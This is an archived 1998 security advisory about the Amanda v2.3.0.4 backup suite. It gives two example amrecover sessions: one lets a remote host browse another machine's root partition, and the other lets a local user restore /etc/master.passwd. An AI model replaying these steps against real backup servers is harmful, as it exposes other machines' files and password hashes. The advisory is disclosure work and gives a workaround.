exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

cpio.11.98-01-05.amanda

cpio.11.98-01-05.amanda
Posted Sep 23, 1999

cpio.11.98-01-05.amanda

SHA-256 | 3d3d279e3e9f23f267f41be61a6d380bf462c5829750963ea94a194d26cc4c2e

cpio.11.98-01-05.amanda

Change Mirror Download

From gale@DARPANET.NET Sat Jan 10 16:39:17 1998
From: Gale Pedowitz <gale@DARPANET.NET>
X-Sender: gale@corinne.cpio.org
To: BUGTRAQ@NETSPACE.ORG
Date: Sat, 10 Jan 1998 11:01:43 -0800
Subject: CPIO-SN #11980105: Amanda v2.3.0.4 Backup Software

Cheers, all,

The notice that was sent out at 4AM today was released in error. This is
the actual release.

CPIO apologizes for the confusion.

--

**************** CPIO Security Notice ****************
Issue 11: 980105
Topic: Amanda v2.3.0.4 Backup Software
Platforms: Platform-independent
************** http://www.darpanet.net **************

This release concerns vulnerabilities in the Amanda backup software
suite; remote users may exploit these vulnerabilities to view arbitrary
files on Amanda network backup clients.


SUMMARY

There are several security problems in the current version of Amanda. The
vulnerabilities detailed here are two of many discovered by an OpenBSD
security audit. The Amanda core team has been contacted.

I. Any attacker can connect remotely to an index server, thus
permitting access to any machine being backed up.
II. A malicious local user may access any partition or any files
on a machine backed up through the network via Amanda.


EXAMPLE I:
index.servername.net | the affected index server
remote.attacker.org | attacker's host
staff | a machine being backed up by the index server

[remote%] amrecover -s index.servername.net
AMRECOVER Version 1.0. Contacting server on index.servername.net ...
220 index.servername.net AMANDA index server (1.0) ready.
Setting restore date to today (1997-12-24)
200 Working date set to 1997-12-24.
200 Config set to DailySet1.
501 No index records for host: remote.attacker.org. Invalid?
amrecover> sethost staff
200 Dump host set to staff.
amrecover> setdisk wd0a
200 Disk set to wd0a
amrecover> ls
[ list of root partion ]


EXAMPLE II:
users | users shell machine being backed up
staff | staff machine being backed up

[users%] amrecover
AMRECOVER Version 1.0. Contacting server on index.servername.net ...
220 index.servername.net AMANDA index server (1.0) ready.
Setting restore date to today (1997-12-24)
200 Working date set to 1997-12-24.
200 Config set to DailySet1.
200 Dump host set to users.
Divided $CWD into directory /joey on disk wd0f mounted at /home/home1.
200 Disk set to wd0f.
amrecover> setdisk wd0a
200 Disk set to wd0a
amrecover> cd etc
amrecover> add master.passwd
Added /etc/master.passwd
amrecover> extract
Extracting files using tape drive /dev/nrst0 on host index.servername.net.
The following tapes are needed: DAILY6
Restoring files into directory /home/home1/joey
Continue? [Y/n]: y
Load tape DAILY6 now
Continue? [Y/n]: y
amrecover> quit
[local%] pwd
/home/home1/joey
[local%] ls master.passwd
master.passwd


AFFECTED PLATFORMS AND NOTES

This vulnerability is related to problems in the software itself, and
appears to be platform-independent. Known (tested) afflicted platforms
include OpenBSD and Linux.


FIXES

A patch from the authors is forthcoming. The only known workaround at this
time is to completely disable Amanda.


CREDITS

This vulnerability was discovered and described by Joey Novell
<joey@cpio.org>. Gale Pedowitz <gale@cpio.org> edited and prepared
this release. Other contributors include Jonathan Katz <jkatz@cpio.org>.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close